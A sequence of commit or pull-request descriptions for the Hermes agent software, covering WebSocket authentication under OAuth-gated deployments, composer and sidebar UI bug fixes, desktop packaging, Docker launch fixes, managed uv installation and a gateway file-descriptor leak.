Dashboard plugins (kanban, hermes-achievements) read
window.__HERMES_SESSION_TOKEN__ directly and hand-assembled WebSocket
URLs with ?token=. That works in loopback/--insecure mode but is
rejected on OAuth-gated deployments, where the session token is absent
and _ws_auth_ok only accepts single-use ?ticket= auth. The result was
401s on plugin REST calls and 1008/403 on the kanban live-events WS
whenever the dashboard ran behind OAuth (e.g. hosted Fly agents).
Make the plugin SDK the single sanctioned auth surface:
- web/src/lib/api.ts: add authedFetch() (raw Response for FormData
uploads / blob downloads, token-or-cookie auth, no throw / no 401
redirect) and buildWsUrl() (assembles a ws(s):// URL with the correct
auth param for the active mode — fresh single-use ticket in gated
mode, token in loopback).
- web/src/plugins/registry.ts: expose authedFetch, buildWsUrl,
buildWsAuthParam, and sdkVersion on window.__HERMES_PLUGIN_SDK__;
add SDK_CONTRACT_VERSION.
- web/src/plugins/sdk.d.ts: hand-authored typed contract for the
plugin SDK + registry globals (single source of truth for the
Window declarations).
- plugins/kanban + hermes-achievements dist bundles: stop reading the
session token directly; route uploads/downloads through
SDK.authedFetch and the live-events WS through SDK.buildWsUrl.
- plugins/kanban plugin_api.py: _ws_upgrade_authorized() delegates the
/events WS upgrade to the canonical web_server._ws_auth_ok gate, so
it transparently accepts loopback token / gated ticket / internal
credential and can never drift from core auth again.
- tests: guard test asserting no plugin dist reads
__HERMES_SESSION_TOKEN__ directly; kanban gated-ticket WS test.
Verified live on a gated staging Fly agent: kanban /events upgrades
101 with a minted ticket (ticket_len=43, ws_auth_ok=True) where the
old code got 403.
Follow-up to #37937. That fix guarded the composer's keyup with
`shouldSkipTriggerRefreshOnKeyUp(key, trigger !== null)`. The `trigger !== null`
check is timing-fragile for Escape: Escape's *keydown* sets `trigger = null`
and closes the menu, but in a real browser the *keyup* fires after a re-render,
so the handler closure sees `trigger === null`, the guard returns false,
`refreshTrigger` runs, re-detects the still-present `/` in the input, and
instantly reopens the menu. (jsdom batches state synchronously so a unit test
could not observe this -- only the running app does.)
Replace the value-based guard with a `triggerKeyConsumedRef` set synchronously
in keydown whenever the open popover consumes a nav/control key
(Arrow/Enter/Tab/Escape). keyup consults and clears that ref, so it is immune
to the keydown->re-render->keyup timing. Applied to both the main composer
(chat/composer/index.tsx) and the message-edit composer
(assistant-ui/thread.tsx).
Removes the now-unused `shouldSkipTriggerRefreshOnKeyUp` helper and its unit
test. The real-DOM regression test now fires keydown+keyup pairs through the
ref-based handlers and asserts Esc closes and stays closed.
Verified by running a production renderer build (Vite v8) under Electron
against a local backend: ArrowDown/ArrowUp cycle the full list and Esc
dismisses the menu without reopening.
The existing slash-menu fix (PR #37937) shipped a unit test that drove the
keydown reducer directly. It did not exercise the actual DOM event path —
specifically the keyup-driven `refreshTrigger` that was the root cause — so
it would not have caught a regression in that path.
This adds a faithful @testing-library reproduction that mounts the real
`useLiveCompletionAdapter` plus the index.tsx trigger wiring and fires real
`keyDown` + `keyUp` event pairs on a contentEditable. It asserts:
- ArrowDown cycles through ALL items (0,1,2,3,4,0,1), not just the first two
- Escape closes the menu and keyup does not reopen it
Reverting the fix (always-refresh keyup + unconditional setTriggerActive(0))
makes this test fail with the highlight stuck at the top — confirming it
guards the real bug.
Follow-up to Ben's PR #37892. Adds a TestInternalCredential block to
test_dashboard_auth_ws_tickets.py exercising the mint-once stability,
multi-use, unminted-rejection, empty-value, wrong-value, reset-and-remint,
and ticket-store-independence branches directly (previously only covered
indirectly via _ws_auth_ok, which left the unminted and empty-value
branches unexercised).
Also corrects the consume_internal_credential docstring: the returned
identity dict is discarded by the current _ws_auth_ok caller (which only
needs the boolean outcome), so the prior 'carry it into its session log'
wording over-promised.
The embedded-TUI PTY child attaches to two server-internal WebSockets:
/api/ws (its primary JSON-RPC gateway backend) and /api/pub (the event
sidecar). Both URLs are built server-side in web_server.py and handed to
the child via its environment.
In OAuth-gated mode (auth_required=true, every hosted Fly agent), _ws_auth_ok
unconditionally rejects the legacy ?token=<_SESSION_TOKEN> path — a leaked
session token must not grant WS access once the gate is engaged. But
_build_gateway_ws_url() still only emitted ?token=, with no gated-mode
branch (its sibling _build_sidecar_url had been given a ticket branch; the
gateway-url builder was missed). So the TUI child's /api/ws upgrade was
rejected 4401 -> 'gateway websocket connection failed' -> 'gateway startup
timeout', leaving the embedded chat unusable on every gated deployment.
A single-use 30s browser ticket is the wrong shape for this link: the child
reads its attach URL once at startup and reuses it on every reconnect, and
on a slow cold boot it may not dial within the TTL. (_build_sidecar_url's
own docstring already flagged this fragility.)
Fix: add a process-lifetime, multi-use internal credential to
dashboard_auth.ws_tickets (internal_ws_credential / consume_internal_credential),
minted once per process and NEVER injected into the SPA — it only leaves the
process via a spawned child's env, so browser-side XSS can't read it, and a
leak grants no more than a ticket already does. _ws_auth_ok accepts it via
?internal= in gated mode only. Both _build_gateway_ws_url and
_build_sidecar_url now use it, so the child can reconnect both sockets.
Loopback / --insecure behavior is unchanged (still ?token=).
Needs review: touches _ws_auth_ok + dashboard_auth (core auth surface).
A still-busy background session (one the user toggled away from) keeps
emitting updateSessionState() heartbeats — stream deltas, and especially
the 'session busy' prompt-rejection errors from auto-drained queued turns.
Each call invoked syncSessionStateToView() unconditionally, staging that
session's messages into the shared $messages view.
flushPendingViewState() guarded against the wrong session reaching the
view, but only one requestAnimationFrame is scheduled per frame and
pendingViewStateRef holds just the latest writer. So within a single
frame a background write could overwrite an already-pending foreground
write, and the stale background transcript (e.g. the red 'session busy'
rows) would render on top of whatever session the user switched to —
appearing to 'bleed' into every session.
Guard at the staging site: a session may only stage into the view when
it is the currently-active session. Background sessions still update
their own cache entry; they just never touch $messages. Pure render
fix, no behavior change to queuing, interrupt, or drain.
When a follow-up message is queued during a busy turn, the composer
clears and the primary button switches back to the Stop affordance. But
clicking Stop ran interruptAndSendNextQueued(), which cancelled the turn
and *immediately* re-sent the head of the queue. The auto-drain effect
(busy true to false) compounded this: any explicit cancel flipped busy
false and re-fired the queue. The net effect was that Stop appeared to
never interrupt -- the agent kept running on the queued prompt.
Fix:
- Stop button (busy + empty composer) now always performs a pure
interrupt via onCancel(); it no longer hijacks the queue.
- An explicit interrupt latches userInterruptedRef so the busy to false
auto-drain skips exactly one drain. Queued turns are preserved and the
user resumes them deliberately (Cmd/Ctrl+K, Enter, or the per-row
send-now arrow), matching the documented Esc=cancel / Cmd+K=send-next
affordances.
- Extracted the settle decision into shouldAutoDrainOnSettle() with unit
tests covering natural completion vs. explicit interrupt.
The desktop composer's `onKeyUp` handler unconditionally re-ran
`refreshTrigger` on every keyup, including the Arrow/Enter/Tab/Escape keys
the open-trigger `onKeyDown` branch had already fully handled. Because
`refreshTrigger` re-detects the trigger and resets the active index to 0,
this produced two bugs in the `/` (and `@`) completion popover:
- ArrowDown/ArrowUp moved the highlight on keydown, then keyup snapped it
straight back to the top — so the user could never cycle past the first
couple of items.
- Escape closed the menu on keydown, then keyup re-detected the still-present
`/` and immediately reopened it — so Esc appeared to do nothing.
Fix: skip the keyup-driven refresh for the navigation/control keys while a
trigger menu is open (they never edit text, so refreshing is pointless), and
only reset the highlight in `refreshTrigger` when the detected trigger query
actually changed. Applied to both the main composer (chat/composer/index.tsx)
and the message-edit composer (assistant-ui/thread.tsx), which shared the
same bug. New `shouldSkipTriggerRefreshOnKeyUp` helper is unit-tested.
WSLg renders Linux GUIs locally through a vGPU surface rather than
shipping frames over the wire, so it doesn't show the remote-compositor
flicker — confirmed by a WSL user seeing zero flickering. Drop the WSL
branch from detectRemoteDisplay so WSLg keeps hardware acceleration;
detection now covers only genuinely-remote displays (SSH X11 forwarding,
VNC, RDP). The HERMES_DESKTOP_DISABLE_GPU override still works for anyone
who does hit it.
Users on remote/forwarded displays (SSH X11 forwarding, VNC, RDP, WSLg)
reported the window flickering during scroll/streaming; nobody on native
Windows/macOS ever saw it.
Root cause: the app shipped with Chromium's default GPU hardware
acceleration and no remote-display handling. Over a remote connection the
GPU compositor can't present accelerated layers cleanly across the wire,
so the surface flashes on repaint. Local sessions composite on the GPU
and never hit it.
Detect a remote display before app `ready` (detectRemoteDisplay in
bootstrap-platform.cjs) and fall back to software rendering via
app.disableHardwareAcceleration() + --disable-gpu-compositing. Software
compositing is rock-steady over the wire and the CPU cost is negligible
next to the connection's latency. HERMES_DESKTOP_DISABLE_GPU overrides
detection both ways for VNC/screen-sharing setups we can't sniff or
remote hosts that do have working acceleration.
The embedded dashboard Chat tab dies on hosted images with a 502 /
"[session ended]": the PTY child's `hermes --tui` spawn runs a runtime
`npm install` that fails.
Root cause: the root package-lock.json describes the WHOLE npm monorepo
workspace set (root + web + ui-tui + apps/*), but the image only installs
root/web/ui-tui — apps/* (the desktop app) is never `npm install`ed here, and
its deps hoist into the shared root node_modules. So the actualized
node_modules permanently disagrees with the canonical lock,
`_tui_need_npm_install()` returns True on every launch, and the runtime
`npm install` it triggers (a) can never converge against the partial monorepo
and (b) races itself across concurrent /api/pty connections -> ENOTEMPTY ->
the launcher `sys.exit(1)`s, the slow install blows past Fly's WS-upgrade
window -> 502 -> the browser shows "[session ended]".
Fix: set `ENV HERMES_TUI_DIR=/opt/hermes/ui-tui` so `_make_tui_argv` takes the
prebuilt-bundle fast path (`node --expose-gc /opt/hermes/ui-tui/dist/entry.js`)
and never reaches the install check — exactly the nix/packaged-release path
the launcher was designed for. The bundle is already built at Layer 8
(`ui-tui && npm run build`); this just tells the launcher to use it.
Verified on a freshly-built image: HERMES_TUI_DIR is set, the prebuilt
dist/entry.js is present, `_make_tui_argv` resolves to the prebuilt node
invocation (no npm), and `docker run ... --tui` no longer prints
"npm install failed". New regression guard: tests/docker/test_tui_prebuilt_bundle.py.
A separate launcher hardening (make _tui_need_npm_install tolerant of
partial-monorepo installs) is tracked independently; this Docker-side fix
resolves the hosted-chat symptom on its own.
Area: docker (Dockerfile + tests/docker).
The send path created the optimistic sidebar row with a null preview, so
a new chat read "Untitled session" until its turn persisted and auto-title
ran. With concurrent new chats now preserved across refreshes, several
"Untitled session" rows could show at once.
Seed the optimistic preview with the user's first message (the branch path
already does this) so each in-flight row is labeled immediately. The
server's own preview/title supersedes it once the turn persists.
Creating several sessions in a row (Ctrl-N, type, send, repeat) and
waiting for one to finish made the other still-running chats disappear
from the sidebar.
Root cause: a new session's first user message isn't flushed to the
SessionDB until its turn is persisted, so the row's message_count stays
0 mid-response. `refreshSessions()` lists with min_messages=1 and then
hard-replaces $sessions. Because every message.complete triggers a
refresh, the moment one session finished, the others (still at
message_count 0) were filtered out of the server page and dropped from
the list.
Fix: merge instead of replace. `mergeWorkingSessions()` preserves any
session that is still in $workingSessionIds but absent from the server
page, so concurrent new chats stay visible until their own turn persists.
Optimistic deletes/archives already remove the row from the previous
list, so a removed session can't be resurrected by the merge.
On a fresh volume there is no gateway_state.json, so the boot reconciler
(cont-init.d/02-reconcile-profiles) registers the gateway-default s6 slot
but leaves it down — it only auto-starts when the last recorded state was
"running". A freshly-provisioned container therefore comes up with the
gateway down until something starts it (e.g. the dashboard's start button).
Add a generic, first-boot-only env-seed in stage2-hook.sh (which runs
before 02-reconcile-profiles): when HERMES_GATEWAY_BOOTSTRAP_STATE=running
and no gateway_state.json exists yet, seed {"gateway_state":"running"} so
the reconciler brings the supervised slot up on the very first boot.
This mirrors the existing HERMES_AUTH_JSON_BOOTSTRAP pattern: it seeds the
same state file the reconciler already consults, guarded by [ ! -f ] so
persisted runtime state always wins on later boots (a deliberately-stopped
gateway stays stopped across restarts). Only the literal "running" is
honoured (the sole value in the reconciler's _AUTOSTART_STATES).
Generic container contract — no host-specific code. Useful to any
orchestrator that provisions a blank volume and wants the gateway up from
first boot (the supervised gateway/dashboard already work on such hosts;
only the first-boot autostart was missing because the CLI lifecycle
commands can't drive the s6 layer when container self-detection misses).
Adds a shell-level contract test and documents the env var.
Replace Electron's built-in zoomIn/zoomOut/resetZoom menu roles with
custom implementations that use a 0.1 zoom-level step instead of
Chromium's default 0.2. This makes Ctrl/Cmd + +/-0 zoom feel more
granular and less jumpy.
Also adds installZoomShortcuts() which intercepts the keyboard shortcuts
via before-input-event. This is necessary on Linux/Windows where the
application menu is set to null, so Chromium's default handler would
otherwise apply the full 0.2 step.
Pin user bubbles 0.75rem below the scroll top via a single token instead of
flush top-0, so the sticky header doesn't sit hard against the thread edge.
Generalises #37747. The WS Origin guard (_ws_host_origin_is_allowed) only
trusted the packaged Electron app's non-web origin (file:// / null / app://)
when the bind was NOT OAuth-gated. The packaged Hermes Desktop renderer loads
over file://, so when it drives a remote OAuth-gated gateway its /api/ws
upgrade was rejected with HTTP 403 even though _ws_auth_ok had already
validated the single-use ?ticket= one line earlier.
This guard runs only AFTER _ws_auth_ok has accepted the WS credential, which
is the real auth boundary in every mode:
* loopback bind -> legacy dashboard session token
* non-loopback --insecure -> legacy session token (Tailscale / LAN, #37747)
* OAuth-gated public bind -> single-use, 30s-TTL, identity-bound ?ticket=
A non-web origin can only come from a native client; a DNS-rebinding attack
always arrives from an http(s) origin and is still match-checked against the
bound host. So once the upstream credential check has passed, the Origin guard
adds nothing for a non-web origin. Collapsed the loopback/non-gated special
cases to 'return True' for non-web origins.
http(s) origins keep the strict same-host check, so browser DNS-rebinding
defence is unchanged.
Tests: gated file:///null/app:// now asserted ALLOWED; cross-site http(s)
still rejected on gated and loopback binds; #37747's loopback and
non-loopback-insecure cases retained. 37/37 test_dashboard_auth_ws_auth +
test_web_server_host_header pass.
Long user prompts stick to the top of the thread while the response streams
beneath them, so a multi-line prompt could eat most of the viewport. Clamp the
read-only human bubble's text to ~2 lines with a soft bottom fade; the clamp
lifts on hover or keyboard focus, and clicking the bubble still opens the edit
composer (which shows the full text). Short messages are untouched — no clamp,
no fade.
Overflow is measured on an unclamped inner wrapper so the ResizeObserver only
fires on real content/width changes, not every frame while the outer
max-height animates open; the measured height feeds --human-msg-full so
expand/collapse animate to the true height instead of overshooting the cap.
The thread renders virtualized turns in natural document flow with padding
spacers, and @tanstack/react-virtual already adjusts scrollTop itself when an
off-screen turn is measured and its real height differs from the 220px
estimate. With the browser default `overflow-anchor: auto`, native scroll
anchoring corrects that SAME size delta too, so the two double-correct and the
view lurches — most visibly with Windows mouse wheels, whose coarse notches
mount/measure several under-estimated turns per tick (Mac trackpads scroll
~1-3px/frame, keeping it sub-perceptual).
Set `overflow-anchor: none` on the thread viewport so only the virtualizer
compensates. Also adds `diag-scroll-reset.mjs`, a CDP wheel-up repro that A/B
tests the anchor behavior at runtime to confirm the fix.
Two TUI polish fixes.
(1) Right-click copy now clears the highlight.
The right-click handler copied an active selection via onCopySelectionNoClear
(the copy-on-select variant that keeps the highlight during a drag) and never
cleared it, so after right-click-to-copy the selection stayed lit with no
confirmation and a follow-up right-click re-copied the stale range instead of
pasting. A successful right-click copy now clears the selection and notifies;
if the copy fails (no clipboard path) the highlight survives and we fall back
to the right-click paste handler, exactly as before.
(2) Group transcript blocks so boundaries read clearly.
Model replies, reasoning/tool trails, and system/error notes rendered with no
vertical separation, so distinct block types butted together and were hard to
scan. Group adjacent blocks by kind: one blank line opens only where the visual
group changes (model prose <-> reasoning/tool trails <-> notes), while a run of
same-kind blocks renders flush. The rule lives in domain/blockLayout.ts
(messageGroup + hasLeadGap) and is applied intrinsically in MessageLine via a
`prev` prop, which fixes the things ad-hoc per-block margins kept breaking:
- Streaming stability: the gap is derived from the stable predecessor, never
the live block's own changing text, so the actively-streaming reply computes
the same gap while it streams as the settled segment does once it flushes.
No reflow/jump.
- Transparent empty trails: a trail hidden by /details, or one carrying only a
token tally (the finalDetails segment message.complete appends), renders
nothing and is transparent to grouping (prevRenderedMsg skips it), so there
are no floating gaps, no doubled gap after a prompt, and no padded space
above the final reply. In the default/collapsed modes content-bearing trails
always render, so the grouping is a no-op there.
The virtual-height estimator counts the group-boundary line so scroll math
stays accurate before Yoga remeasures.
ui-tui/src/domain/blockLayout.ts (new), components/messageLine.tsx,
components/streamingAssistant.tsx, components/appLayout.tsx,
lib/virtualHeights.ts, app/useMainApp.ts.
Tests: blockLayout.test.ts (grouping + hidden/empty-trail visibility),
virtualHeights leadGap, app-mouse.test.ts copy behavior. Full ui-tui suite
green apart from 3 pre-existing local/env failures (cursorDrift, ink-resize,
virtualHeights user-prompt-width) unchanged from main.
The Browser Automation and Text-to-Speech provider pickers listed the paid
"Nous Subscription" gateway row first, so on a fresh install the menu cursor
defaulted to index 0 (Nous). Pressing Enter selected it and ran the inline
Nous Portal device-code login — walking users into a paid offering they
never chose.
Reorder both provider lists so the free, no-key local backend is index 0
(Local Browser / Microsoft Edge TTS). Users who already configured Nous are
unaffected: _detect_active_provider_index still resolves their active row
first, so the cursor lands on Nous (now index 1) for them.
Reported by Javier via Kujila.
Add `display.interface` config key so users can make the modern TUI the
default for bare `hermes` / `hermes chat` without exporting HERMES_TUI=1 in
every shell. Default stays "cli" to preserve current behavior.
Add a `--cli` flag (mirrors `--tui`) so an explicit invocation can force the
classic prompt_toolkit REPL even when `display.interface: tui` is configured.
Precedence (highest first): `--cli` > `--tui`/`HERMES_TUI=1` > config
`display.interface` > classic REPL. Two resolvers enforce it:
* `_resolve_use_tui(args)` — the args-aware resolver used by `cmd_chat`
and the Termux fast-TUI path (uses full load_config()).
* `_wants_tui_early(argv)` — a dependency-free early resolver used by
mouse-residue suppression and the Termux fast paths, which run before
argparse / hermes_cli.config are importable (minimal cached YAML read).
Both `--cli` and `--tui` are registered via `_inherited_flag`, so they are
carried across self-relaunch automatically.
- config: add display.interface ("cli" default), bump _config_version 25->26.
The generic missing-field migration + load_config() deep-merge seed the key
for existing configs; no bespoke migration block needed.
- docs: document --cli flag and display.interface in cli-commands.md and
the TUI user guide.
- tests: new test_default_interface_resolution.py covering resolver
precedence at every layer, early resolver edge cases (missing/garbage
config), parser flags, and relaunch inheritance.
The model row is a Radix sub-trigger (no onSelect), so switching was
pointer-only. Wire Enter/Space alongside onClick so keyboard users can switch
models too.
Address Copilot review: document the `adopted` flag and nullable `pinnedCommit`
in the marker schema comment, and default `done(note = {})` so the dock-pinned
marker write is unambiguous (object spread of undefined was already a no-op, but
explicit is clearer).
selectModel snapshots the prior model/provider and restores the store +
query cache when the backend switch fails, so the UI never shows a model the
backend didn't actually select.
Pin #37718: the inherit plist must grant audio-input, every device.*
entitlement on the main app must also be inherited by the Helper/Setup
processes, and both entitlement files must stay valid plists.
Add com.apple.security.device.audio-input to entitlements.mac.inherit.plist.
Under hardenedRuntime the Electron Helper/Setup processes inherit this file,
and the missing entitlement made macOS TCC deny the microphone with no prompt,
breaking voice chat.
Fixes#37718
Electron's chrome-sandbox helper must be root:root 4755 on Linux or the
sandboxed renderer aborts before the desktop app starts. The existing
installer only searched for macOS .app bundles, so a successful Linux
build was reported as missing.
Changes:
- Add _desktop_linux_sandbox_fixup() to hermes_cli/main.py, called
before launching a packaged desktop app on Linux.
- Use lstat() + S_ISREG check to reject symlinks — chown/chmod on a
symlink target would set SUID on an arbitrary path.
- Update install.sh to recognize Linux unpacked artifacts and configure
chrome-sandbox with proper error handling (the original PR silently
ignored chown/chmod failures).
- Add regression tests: normal fixup flow, symlink rejection, and
already-configured skip path.
Closes#37529 (rebased, merge conflicts resolved, copilot review
feedback addressed).
The Dock stores persistent-apps as type-15 file:// URLs; the type-0/raw-path
tile we wrote was silently dropped on the next Dock restart (so the pin never
took, yet we'd stamped the marker and never retried). Use pathToFileURL + type
15 and flush prefs through cfprefsd before `killall Dock`. Verified end-to-end
on a packaged build: move -> adopt -> Dock tile lands as
file:///Applications/Hermes.app/.
Production code now uses ensure_uv()/update_managed_uv() from
managed_uv.py instead of shutil.which("uv") directly. Tests that
patched shutil.which to control uv availability no longer controlled
the actual code path, causing CI failures.
Add an autouse _patch_managed_uv fixture to test_update_autostash.py
and test_uv_tool_update.py (matching the existing fixture in
test_cmd_update.py). The fixture makes managed_uv functions delegate
to shutil.which so existing test patches flow through naturally.
Replace the multi-path UV resolution chain (PATH probing, conda guards,
5-location trust ordering, temp-dir fallback installs) with a single
managed uv binary at $HERMES_HOME/bin/uv. Every code path that needs
uv resolves it from that one location; if missing, ensure_uv()
bootstraps it via the official standalone installer.
Key changes:
- New hermes_cli/managed_uv.py: managed_uv_path(), resolve_uv(),
ensure_uv() (returns (path, freshly_bootstrapped) tuple),
update_managed_uv(), rebuild_venv(), installer internals.
- hermes_cli/main.py: replace all shutil.which('uv') with ensure_uv(),
add venv rebuild on first-time managed uv bootstrap, update_managed_uv
before dep install on all 3 update paths.
- scripts/install.sh: install_uv() always installs to
$HERMES_HOME/bin/uv; delete ensure_fts5, _python_has_fts5,
_reinstall_python_with_fts5, _warn_no_fts5 (61 lines).
Managed uv always installs current Python with FTS5.
- scripts/install.ps1: Install-Uv always installs to
$HermesHome\bin\uv.exe; Resolve-UvCmd checks managed location first.
- hermes_state.py: simplified FTS5 warning now suggests 'hermes update'
as the fix instead of blaming install method.
- tests: 15 tests in test_managed_uv.py, autouse _patch_managed_uv
fixture in test_cmd_update.py.
Closes#37605, Closes#37622
Consolidate per-package package-lock.json files into a single root-level
workspace lockfile. Update all consumers:
- Nix: shared src/npmDeps/npmDepsHash in lib.nix; devshell hook stamps
package.json paths then runs npm ci from root; individual .nix files
use mkNpmPassthru attrs instead of per-package fetchNpmDeps.
- Python CLI: new _workspace_root() helper so _tui_need_npm_install,
_make_tui_argv, _build_web_ui resolve lockfile/node_modules from the
workspace root.
- Desktop: replace --force-build/mtime heuristic with content-hash build
stamp (_compute_desktop_content_hash via pathspec). Remove --force-build
flag.
- Dockerfile: single root npm install; no per-directory lockfile copies.
- CI: nix-lockfile-fix and osv-scanner reference root package-lock.json;
apps/dashboard → apps/desktop.
- Tests: new test_tui_npm_install.py; desktop stamp tests in
test_gui_command.py; updated assertions in test_cmd_update.py,
test_web_ui_build.py, test_dockerfile_pid1_reaping.py.
- Docs: remove --force-build from desktop flag table.
Deleted: apps/desktop/package-lock.json, ui-tui/package-lock.json,
ui-tui/packages/hermes-ink/package-lock.json, web/package-lock.json.
- selectModel reports success; edits bail (and roll back) instead of landing
on the previously active model when a switch fails
- Fast toggle stays available to turn off a carried-over speed param even when
the new model has no native fast mechanism
- active row's "Fast" label derives from the same fastControl as the submenu
toggle, so it's consistent and handles standalone `-fast` model ids
Seven Copilot inline review comments on #37679, four worth landing
in a polish pass before merge:
1. _dispose_unused_adapter signature: 'BasePlatformAdapter' ->
'BasePlatformAdapter | None'. The function explicitly handles
None and the reconnect watcher calls it with None in the
except arm, so the annotation now matches the actual contract.
2. (duplicate of #1 on a different line) — same fix.
3. except Exception in _dispose_unused_adapter — the reviewer
asked about asyncio.CancelledError swallowing. On Python 3.8+
(Hermes requires 3.13, see pyproject.toml), CancelledError
inherits from BaseException, NOT Exception, so the existing
'except Exception' does NOT swallow task cancellation. Added
an explicit comment explaining the contract so future readers
don't repeat the analysis. We don't re-raise because the
watcher loop intentionally treats dispose failures as
best-effort: a failed dispose on an unowned adapter should not
take down the watcher that's keeping the gateway alive.
4. _response_store = None after close in api_server.py — the
reviewer flagged this for idempotency. Decided to keep the
non-None state intentionally: setting it to None cascades
to ~9 callers that access self._response_store without a
None check, and 'close() is idempotent on a closed sqlite3
Connection' means the current code is already safe. The
type stays stable; LSP doesn't flag a cascade of
reportOptionalMemberAccess errors. (This matches the
pre-existing pattern in the codebase — e.g.
_mark_disconnected doesn't reset state to None either.)
5. _build_adapter_with_store: reviewer worried about
disconnect() failing on the self.name property if
__init__ wasn't called. Already handled: we set
'adapter.platform = Platform.API_SERVER' so the
'self.platform.value.title()' property returns
'Api_Server' without raising. The exception-swallowing
branch in disconnect() does call self.name via the
logger.debug format, so this is a real path that needs
the platform attribute, and we have it.
6. test_disconnect_closes_response_store: bare 'pytest.raises(Exception)'
-> 'pytest.raises(sqlite3.ProgrammingError)'. The bare
Exception matcher would silently accept AttributeError,
OperationalError, env-related issues, etc. The specific
exception type ('Cannot operate on a closed database') is
the actual signal we want — proves the SQLite conn is
closed, not just that *something* raised.
7. test_nonretryable_failure_disposes_unowned_adapter:
assertion tightened from '>= 1' to '== 1' on
adapter._disconnect_calls. The docstring said 'exactly once',
the assertion now matches. Catches the hypothetical
'watcher disposes the same adapter twice' regression that
'>=' would have missed.
The check-attribution CI job on #37679 failed because the commit
author email nolan@0xvox.com (a local git config mistake on this
machine) is not in scripts/release.py AUTHOR_MAP. The commit
itself is now re-authored to fearvox1015@gmail.com, and this
follow-up adds the entry to AUTHOR_MAP so any future commits
authored from this email also pass the check.
Three separate code paths in the gateway's platform reconnect loop
leaked file descriptors every retry, exhausting the default 2560-fd
ulimit in ~12 hours of continuous failure and turning the gateway
into a zombie that raises OSError: [Errno 24] on every open() (#37011).
Root cause:
* APIServerAdapter.__init__ opens a ResponseStore SQLite connection
that holds 2 fds (db file + WAL sidecar).
* APIServerAdapter.disconnect() previously only stopped the aiohttp
web server — the ResponseStore connection was never closed.
* The reconnect watcher in _platform_reconnect_watcher constructs a
fresh adapter on every retry attempt. When the connect call fails
(3 paths: non-retryable error, retryable error, exception during
connect) the adapter is dropped without ever being installed on
self.adapters, so nothing else calls its disconnect(). Result: the
2 ResponseStore fds stay open until GC sweeps the unreachable
object, which Python's cyclic GC does not do promptly for
asyncio-bound native handles.
2 fds × 1 retry × (3600s / 300s backoff cap) ≈ 12 fds/hour.
2560 fds / 12 fds/hr ≈ 12h to ulimit exhaustion.
Fix:
* APIServerAdapter.disconnect() now also calls
self._response_store.close() (with a try/except so a SQLite
close failure doesn't abort the aiohttp teardown).
* New module-level helper _dispose_unused_adapter(adapter) in
gateway/run.py that calls adapter.disconnect() and swallows
any exception (so half-constructed adapters whose __init__
crashed don't kill the watcher loop).
* _platform_reconnect_watcher calls _dispose_unused_adapter() in
all three failure paths: non-retryable, retryable, and the
except Exception arm. adapter = None is initialized
before the try so the except arm can see the partial
construction.
Tests:
* New file tests/gateway/test_platform_reconnect_fd_leak.py with
7 regression tests covering all three failure paths, the
_dispose_unused_adapter helper (None + raising-disconnect cases),
and the APIServerAdapter ResponseStore close behavior (success +
close-exception cases). The _CountingAdapter fixture tracks
disconnect() invocations and an _open_fds counter that is
decremented on dispose, so the assertion is the literal
observable behavior of the leak.
Refs:
- Closes#37011 (the original fd-leak report)
- Supersedes #37018, #37110, #37238, #37260, #37394 (7 competing
open PRs all addressing the same root cause from different angles;
none of them rebased cleanly against current main, and none
covered all three failure paths in one fix with regression tests
for both the watcher and the platform-level close behavior)
A long-lived process (gateway, watcher) caches the Nous Portal's
recommended-models payload and can pin a model for its whole lifetime.
When that model is later dropped from the Nous -> OpenRouter catalog,
every auxiliary call 404s with 'model does not exist in our
configuration or OpenRouter catalog' until the process restarts.
Now such a 404 force-refreshes the Portal recommendation and retries
once with the current pick (or the gemini-3-flash-preview default).
Scoped to Nous-routed calls only.
- _is_model_not_found_error(): 404/400 'not found / does not exist /
not a valid model' predicate, excludes billing keywords so it never
overlaps _is_payment_error.
- _refresh_nous_recommended_model(): force-refresh fetch, returns a
model distinct from the one that failed, else the known-good default.
- Wired into both call_llm and async_call_llm error chains.
First-launch "already installed?" hinged solely on a marker that only the
desktop's own bootstrap writes, so a runtime from `install.sh --include-desktop`
(or a DMG launch over a prior CLI install) was runnable yet markerless and got
the WHOLE installer re-run on top of it. Detect a runnable ACTIVE_HERMES_ROOT
(valid source + venv), adopt it (stamp the marker, recording HEAD), and forward
straight to the app. Repair keeps forcing a real re-bootstrap.
Also: on first packaged macOS launch relocate the bundle into /Applications
(Electron relaunches from there) and pin the canonical copy to the Dock once,
so users stop re-opening the installer from Downloads/the DMG.
Replace the status-bar model chip's modal with a Cursor-style dropdown:
- providers grouped by name in a stable order (no recency reshuffle on select)
- per-model hover-Edit submenu for reasoning effort + fast, gated by per-model
capabilities now surfaced in the model.options payload
- unified Fast toggle: flips the speed=fast param where supported, else swaps
to the model's `-fast` variant (base and variant collapse into one row)
- localStorage-backed "Edit Models" dialog to choose which models appear
Adds reusable dropdown primitives (DropdownMenuSearch, shared row/label
tokens, portaled + collision-aware submenus) and reads session state from
nanostores rather than prop-drilling, so editing options doesn't rebuild and
close the menu.
TestDialecticLifecycleSmoke._await_thread did a single join(timeout=3.0) and
then proceeded regardless of whether the background dialectic thread had
finished. On a loaded CI runner (6 parallel test slices) the prewarm thread's
completion can slip past that 3s window, so the join times out silently and the
test reads _prefetch_result before the worker wrote it — the intermittent
'session-start prewarm must land in _prefetch_result' failure.
Join in a loop up to a 30s ceiling and assert the thread is actually dead, so a
genuine hang surfaces as a clear failure instead of a timing race. Reproduced
the old failure deterministically (5/5 fails with a 3.5s prewarm delay) and
confirmed the fix (0/8) before/after.
Background-task (/background, /btw) result media now routes to the
type-specific sender — TTS clip → voice bubble, video → send_video,
image → send_image_file — instead of forcing everything through
send_document. Mirrors the streaming + kanban delivery paths and
reuses base.should_send_media_as_audio for the Telegram OGG nuance.
Co-authored-by: LJ Li <liliangjya@gmail.com>
Co-authored-by: Kolektori <256073454+Kolektori@users.noreply.github.com>
Module-level asyncio.Lock() binds to whatever event loop was active at
import time. When the same web_server module is reused across multiple
TestClient instances (or across uvicorn reloads), the old lock still
references a defunct loop, causing 'attached to a different loop' errors
and flaky subscriber-registration races in CI.
Replace the module-level _event_channels dict + _event_lock with:
- _lifespan() async context manager that creates both on the running
event loop during FastAPI startup (guaranteed correct loop binding)
- _get_event_state() lazy accessor that initialises on app.state when
TestClient is used without a `with` block (preserves backward compat)
All call sites (_broadcast_event, /api/pub, /api/events) now receive the
app reference and read state via _get_event_state(app) instead of the
module globals. The test polling loop is updated to check
app.state.event_channels rather than the removed module attribute.
Shutting down the callback server stopped the serve thread but left the
worker spinning in _xai_wait_for_callback (which polls callback_result)
until the timeout. Flag callback_result as cancelled on DELETE so the
wait returns promptly and the daemon thread exits — avoids thread
